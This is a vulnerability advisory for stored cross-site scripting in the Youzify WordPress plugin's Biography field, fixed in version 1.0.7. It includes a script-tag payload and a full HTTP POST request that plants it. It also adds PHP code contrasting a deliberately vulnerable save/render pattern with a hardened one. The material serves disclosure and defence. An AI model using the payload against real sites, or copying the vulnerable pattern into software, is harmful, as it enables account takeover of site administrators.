WordPress Plugin Vulnerabilities

Youzify < 1.0.7 - Stored Cross-Site Scripting via Biography

Description

The About Me widget of the plugin does not properly sanitise its Biography field, allowing any authenticated user to store Cross-Site Scripting payloads in it, which are executed whenever the affected user profile is viewed. A low-privilege user could use this to gain unauthorised access to the admin side of the blog, for example by inducing an administrator to view the profile containing the malicious payload, which then adds a rogue account.

Proof of Concept

Log on as any user, go to the 'About me' widget section of your profile (https://example.com/members/<your username>/widgets/about_me/) and set the following payload in the Biography field: <script>alert(/XSS/)</script>

Then view the profile (either as yourself or any other user) to trigger the XSS (https://example.com/members/<username>/)

POST /members/user1/widgets/about_me/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------330784649142342642204053017225
Content-Length: 1288
Connection: close
Cookie: [your user cookies]
Upgrade-Insecure-Requests: 1


-----------------------------330784649142342642204053017225
Content-Disposition: form-data; name="upload_youzify_wg_about_me_photo"; filename=""
Content-Type: application/octet-stream


-----------------------------330784649142342642204053017225
Content-Disposition: form-data; name="youzify_options[youzify_wg_about_me_photo]"


-----------------------------330784649142342642204053017225
Content-Disposition: form-data; name="youzify_options[youzify_wg_about_me_title]"

User1

-----------------------------330784649142342642204053017225
Content-Disposition: form-data; name="youzify_options[youzify_wg_about_me_desc]"


-----------------------------330784649142342642204053017225
Content-Disposition: form-data; name="youzify_options[youzify_wg_about_me_bio]"

XSS here <script>alert(/XSS/)</script>

-----------------------------330784649142342642204053017225
Content-Disposition: form-data; name="action"

youzify_profile_settings_save_data

-----------------------------330784649142342642204053017225
Content-Disposition: form-data; name="security"

318e0fbc53

-----------------------------330784649142342642204053017225
Content-Disposition: form-data; name="save"


-----------------------------330784649142342642204053017225--
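The root cause described above is a biography value that is stored as posted and echoed back into the profile page. The snippet below is an added illustration, not Youzify's code, of the vulnerable pattern next to a hardened handler for the same flow: nonce verification against the 'security' field seen in the request above, sanitisation with wp_kses_post() on save, and escaping again on output. The option names (example_options[bio]), the user-meta key, the AJAX action and the nonce action are all hypothetical; only the WordPress API functions are real.

```php
<?php
// Added illustration, not Youzify's code. Assumes a hypothetical profile widget
// that stores a user's biography in user meta under 'example_about_me_bio'
// (hypothetical key) and renders it on the member profile page.

// --- Vulnerable pattern: the raw POST value is stored and later echoed. ---
function example_about_me_save_vulnerable() {
    $user_id = get_current_user_id();
    // No nonce check and no sanitisation: whatever the user posts is stored verbatim,
    // including <script> tags. This mirrors the behaviour described in the advisory.
    $bio = isset( $_POST['example_options']['bio'] ) ? $_POST['example_options']['bio'] : '';
    update_user_meta( $user_id, 'example_about_me_bio', $bio );
}

function example_about_me_render_vulnerable( $user_id ) {
    // Stored markup is emitted as-is, so the payload runs in every viewer's browser.
    echo '<div class="about-me-bio">' . get_user_meta( $user_id, 'example_about_me_bio', true ) . '</div>';
}

// --- Hardened pattern: verify the request, strip disallowed markup on save, escape on output. ---
function example_about_me_save_hardened() {
    // Reject requests that do not carry a valid nonce in the 'security' field.
    // The form would emit it with wp_create_nonce( 'example_about_me_save' ) (hypothetical action name).
    check_ajax_referer( 'example_about_me_save', 'security' );

    $user_id = get_current_user_id();
    if ( ! $user_id ) {
        wp_send_json_error( 'not logged in', 403 );
    }

    $raw = isset( $_POST['example_options']['bio'] ) ? wp_unslash( $_POST['example_options']['bio'] ) : '';

    // wp_kses_post() keeps the HTML WordPress allows in post content (<p>, <a>, <strong>, ...)
    // and removes <script>, on* event-handler attributes and javascript: URLs.
    // If the biography should be plain text only, sanitize_textarea_field() is the stricter choice.
    $bio = wp_kses_post( $raw );

    update_user_meta( $user_id, 'example_about_me_bio', $bio );
    wp_send_json_success();
}

function example_about_me_render_hardened( $user_id ) {
    $bio = get_user_meta( $user_id, 'example_about_me_bio', true );
    // Filter on output as well: rows written before the fix, or by another code path,
    // must not be trusted just because new saves are sanitised. wp_kses_post() is
    // idempotent, so applying it again to already-clean data is harmless.
    echo '<div class="about-me-bio">' . wp_kses_post( $bio ) . '</div>';
}

// Hypothetical AJAX hook name; in a real plugin this matches the posted 'action' value.
add_action( 'wp_ajax_example_about_me_save', 'example_about_me_save_hardened' );
```

With the hardened handler, the payload from the proof of concept is stored as the text "XSS here" with the script tag removed, and the rendered profile never contains executable markup; a plain-text biography would instead be escaped with esc_html() at output.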

Affects Plugins

Fixed in 1.0.7

Classification

Type
XSS

Miscellaneous

Original Researcher
Phu Tran from techlabcorp.com
Submitter
Phu Tran
Verified
Yes

Timeline

Publicly Published
2021-06-28
Added
2021-06-28
Last Updated
2022-01-02
